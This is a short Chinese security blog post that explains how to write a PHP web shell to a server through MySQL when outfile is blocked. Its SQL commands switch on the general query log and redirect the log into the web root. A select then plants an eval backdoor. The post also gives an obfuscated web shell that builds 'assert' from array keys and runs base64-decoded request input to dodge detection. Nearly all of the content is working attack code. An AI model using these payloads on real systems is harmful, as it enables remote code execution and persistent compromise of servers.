SQL语句利用日志写shell

发表于 2017-03-22 | 分类于奇技淫巧

outfile被禁止，或者写入文件被拦截；

在数据库中操作如下：（必须是root权限）

show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

原文：戳我

------本文结束，感谢阅读------

本文作者： Evi1cg
本文链接： https://evi1cg.github.io/archives/test1.html
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。

RSS

GitHub Twitter 微博 E-Mail